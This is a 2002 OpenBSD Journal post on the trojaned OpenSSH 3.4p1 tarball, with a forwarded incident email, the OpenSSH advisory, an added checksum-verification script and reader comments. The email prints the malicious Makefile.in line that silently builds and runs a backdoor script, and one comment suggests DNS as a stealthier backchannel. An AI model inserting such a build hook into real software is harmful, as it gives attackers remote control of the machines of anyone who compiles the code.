OpenBSD Journal

openssh trojaned?

Contributed by jose on from the checksums-and-GPG dept.

Joshua Steele was the first of many to write to us with this story:
"Don't know if it's worth anything, but there are some rumors on the FreeBSD-security mailing list about openssh packages distributed from openssh.com and openbsd.org being trojaned.

UPDATE We have a copy of the OpenSSH note on the subject in the extended copy section. Thanks Rick, Niels.

FYI (I'm not on -security)

----- Forwarded message from Edwin Groothuis -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis
To: incidents@securityfocus.com
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org
(and probably all its mirrors now) is trojaned:

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz


The OpenBSD people have been informed about it (via email to
deraadt@openbsd.org and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &
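Review bot: the line added to the `all:` recipe compiles `bf-test.c`, runs it, and then backgrounds the generated script (`sh ./bf-test.out &`) as a side effect of building `libopenbsd-compat.a`; a build recipe should never execute a generated script, and the leading `@` suppresses command echo so the extra step does not show up in normal build output, which is why checking the tarball's checksum and signature (rather than watching the build) is the reliable way to catch this.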

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net).
 
[1]
http://www.mavetju.org/~edwin/bf-test.c

[2]
http://www.mavetju.org/~edwin/bf-output.sh


This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

"
I have independently verified this story by fetching the OpenSSH-3.4p1 archive from the official site and then comparing it to the archive I pulled from a UK mirror. I generated the same files as discussed in this email.

This is why cryptographic checksums are good, GPG signatures are good, and the distfiles structure we have in the BSD ports tree is good.

The OpenSSH Note


From: Niels Provos

To: security-announce@openbsd.org, misc@openbsd.org,
        announce@openbsd.org
Subject: OpenSSH Security Advisory:  Trojaned Distribution Files
Date: Thu, 1 Aug 2002 11:19:49 -0400

OpenSSH Security Advisory (adv.trojan)

1. Systems affected:

OpenSSH version 3.2.2p1, 3.4p1 and 3.4 have been trojaned on the
OpenBSD ftp server and potentially propagated via the normal mirroring
process to other ftp servers.  The code was inserted some time between
the 30th and 31st of July.  We replaced the trojaned files with their
originals at 7AM MDT, August 1st.

2. Impact:

Anyone who has installed OpenSSH from the OpenBSD ftp server or any
mirror within that time frame should consider his system compromised.
The trojan allows the attacker to gain control of the system as the
user compiling the binary.  Arbitrary commands can be executed.

3. Solution:

Verify that you did not build a trojaned version of the sources.  The
portable SSH tarballs contain PGP signatures that should be verified
before installation.  You can also use the following MD5 checksums for
verification.

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c
MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01
MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a

4. Details

When building the OpenSSH binaries, the trojan resides in bf-test.c
and causes code to execute which connects to a specified IP address.
The destination port is normally used by the IRC protocol.  A
connection attempt is made once an hour.  If the connection is
successful, arbitrary commands may be executed.

Three commands are understood by the backdoor:

Command A:  Kill the exploit.
Command D:  Execute a command.
Command M:  Go to sleep.

5. Notice:

Because of the urgency of this issue, the advisory may not be
complete.  Updates will be posted to the OpenSSH web pages if
necessary.
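As an added example (not the advisory's or the OpenSSH project's code), the check the advisory asks for, done in Python: parse the md5(1)-style lines quoted above into a table, then classify a downloaded distfile as ok, mismatching, unknown, or matching the trojaned 3.4p1 digest reported in the forwarded mail. It does not replace the PGP signature check the advisory also recommends.

```python
import hashlib
import re
from pathlib import Path

# Known-good digests, copied from the advisory above.
ADVISORY_CHECKSUMS = """\
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c
MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01
MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a
"""

# Digest of the trojaned 3.4p1 tarball reported in the forwarded mail above.
KNOWN_BAD = {"3ac9bc346d736b4a51d676faa2a08a57": "openssh-3.4p1.tar.gz (trojaned)"}

# BSD md5(1) output format: "MD5 (filename) = hexdigest"
LINE_RE = re.compile(r"^MD5 \((?P<name>[^)]+)\) = (?P<hash>[0-9a-fA-F]{32})$")


def parse_checksums(text):
    """Return {filename: md5hex} from md5(1)-style lines; other lines are ignored."""
    table = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            table[m.group("name")] = m.group("hash").lower()
    return table


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def classify(name, data, expected=None, known_bad=KNOWN_BAD):
    """Classify distfile bytes as 'trojaned', 'ok', 'mismatch' or 'unknown'.
    A known-bad digest wins; a name missing from the table is never accepted."""
    if expected is None:
        expected = parse_checksums(ADVISORY_CHECKSUMS)
    digest = md5_hex(data)
    if digest in known_bad:
        return "trojaned"
    if name not in expected:
        return "unknown"
    return "ok" if digest == expected[name] else "mismatch"


def verify_distfile(path):
    """Check a downloaded file on disk against the advisory's table."""
    p = Path(path)
    return classify(p.name, p.read_bytes())
```

The known-bad digest is tested before the good table so a trojaned download is reported as such rather than as a plain mismatch.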




Comments
  1. By Boubou () on

    Same story on ./

    http://slashdot.org/articles/02/08/01/129228.shtml?tid=172

  2. By Boubou () on

    Looks like the (trojaned?) version is in openssh-3.4p1 portable & distfile.

    The Story:
    http://www.mavetju.org/weblog/weblog.php

    --
    Boubou - Curiosity is not a flaw
    ouf.org & b0ub0u.com

  3. By Anonymous Coward () on

    Well, by coincidence I did a new v3.1 machine build with full patches last night, and sure enough on seeing all the alarm bells ringing this morning, I saw that I used a trojaned version of openssh-3.4.tgz. Oops...

    To clear up the problem, is a simple rebuild/reinstall of an unaffected source sufficient?

    Forensic reports on this are obviously still a bit incomplete, but various comments seem to suggest the trojan/daemon only runs during the compile/install process. Or did I get this wrong?

    If so, then as I have suggested, a simple compile/install from clean source should be sufficient, right? Or is this a bit more insidious, and should I consider doing a full machine reinstall and patching?

    Comments, anyone?

    As an interim measure, I guess blocking all port 6667 activity is a possibility.

  4. By Larry () on

    Is it safe to assume the CVS repositories were not affected and just ftp?

  5. By Anonymous Coward () on

    Any information?

  6. By Anonymous Coward () on

    This is a good example of the power of capabilities-based systems. Make shouldn't have the capability of making outgoing connections to irc ports, ever. sshd shouldn't make outgoing connections to anything, ever. That which shouldn't happen should be denied. That's why I think that OpenBSD's Systrace idea is so important. It is a step towards a capabilities-based system and if anyone was building openssh with systrace enabled, it would have stopped this trojan. It's another form of sandboxing, in other words, fault isolation, which is the future of OS security, IMHO.

    Or maybe I'm just utterly paranoid.

    Btw, if these guys weren't total lamers they would have used dns as a backchannel, not irc.

  7. By Anonymous Coward () on

    I wonder who trojaned OpenSSH...
    Big Corporate?
    Industrial Espionage?
    Government Agencies?
    Defense Department?
    Illuminati?
